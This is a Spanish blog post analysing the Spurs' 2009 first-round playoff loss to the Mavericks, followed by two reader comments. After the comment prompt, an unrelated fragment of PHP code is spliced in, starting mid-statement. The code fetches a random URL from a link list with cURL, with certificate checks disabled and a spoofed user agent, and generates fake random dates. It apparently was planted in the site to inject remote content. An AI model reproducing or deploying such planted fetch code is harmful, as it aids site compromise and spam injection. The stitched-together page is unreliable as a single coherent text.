Spurs 1 – Mavericks 4: Demasiado solos

29 de April de 2009 por TheDeerHunter

Primera pseudo-sorpresa de la postemporada y primera pseudo-discrepancia en nuestros pronósticos. Digo “pseudo” porque sí hubo muchas voces que apostabanpor la victoria de Dallas, incluso alguno se atrevía a vaticinarla en 5 partidos. Todo un acierto.

Al final, no ha sido una eliminatoria equilibrada en absoluto. Ha pesado mucho la baja de Ginobili y la recuperación de Josh Howard. Era difícil pensar que el alero de los Mavs iba a volver en semjante estado de forma, él que precisamente no ha sido nunca el titán de templanza que se requería en los momentos decisivos. Por el contrario, Ginobili es un jugador insustituible prácticamente en cualquier equipo y su baja ha significado un mazazo moral tremendo que se evidenció desde que saltó la noticia.

Tim Duncan y Parker se han multiplicado, como los purasangres que son, pero en su equipo se ha evidenciado un abismo entre el exceso de veteranía y la ausencia de experiencia. Carlisle lo ha aprovechado bien aislando a las dos estrellas. Parker sigue estando para marcarse 30 puntos por partido, pero Duncan ya no y más si se encuentra al más centrado Dampier que hemos conocido. Si hablamos de lo que son capaces Finley, Bowen, Kurt Thomas, Vaughn o el colapso de Mason, Bonner, Hill o Gooden tenemos una ecuación difícil de despejar.

Los Mavericks no han mostrado un juego arrollador, como el que les recordábamos de antaño. Se han limitado a defender muy bien y a hacer cada uno su trabajo lo mejor posible. No hemos visto un buen Nowitzki, ni un buen Terry pero sí a un extraordinario Howard y a unos muy correctos Kidd, Barea, Bass y Dampier. Suficiente para doblegar a únicamente dos tíos. Al final, casi todas las claves que apuntamos en su día se han resuelto a favor de ellos y ahí queda el resultado. Ahora a esperar previsiblemente a Denver. Y no lo van a tener fácil.

En el futuro inmediato de los Spurs planea la sombra de la reconstrucción. Es difícil lanzarse a por ella sin apurar las últimos coletazos de la era Duncan. Mientras él esté en el equipo, habría que contar con ellos aunque debería ser prioritario sustituir a varios veteranos que apenas aportan nada. Por desgracia para la franquicia ninguno termina contrato este verano así que quizás tendrán que esperar al límite de traspasos del año próximo para darle valor a algún expiring jugoso. Por este motivo no parece objetivamente que este sea el momento más idóneo para abrir el melón de la reconstrucción, a no ser que se quiera traspasar a Ginibili… porque ni contemplo la posibilidad de que lo intenten con Duncan o Parker.

En teoría deberían fichar un center atlético que libere a Duncan de esa posición que no le va bien en absoluto. También deberían reforzarse con algún alero de garantías. Estamos seguros que todavía habrá alguien interesante por ahí que se pirre por jugar junto a estos cracks. Y con el banquillo les queda tela de trabajo por hacer… De momento, deben hacer frente a la renovación de Gooden que, atendiendo a su rendimiento, no deberían acometer. Quizás sí a la baja, según las pretensiones del jugador, porque uponemos que no se le ha olvidado jugar a esto de la noche a la mañana.

Comenta

2 comentarios a esta entrada

  1. ÑBA dice:
    #1

    Está el debate abierto si se trata de un cambio de ciclo o que la baja de Ginóbili era más importante de lo esperado. Todo depende de cómo se muevan este verano, pero con “Manudo” no tienen tan mal equipo (todavía)…

    PD: Me han jodío la porra, el 4-2 que les puse, creía que ganarían este en San Antonio… por ahora había acertado todos jejejj

      Citar

  2. Txusma dice:
    #2

    Otro equipo abocado al proyecto 2010? Aparte de Duncan y Parker, ningun otro jugador de la plantilla tiene garantizado contrato para ese año, parece claro cuando empezara la verdadera reconstruccion.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>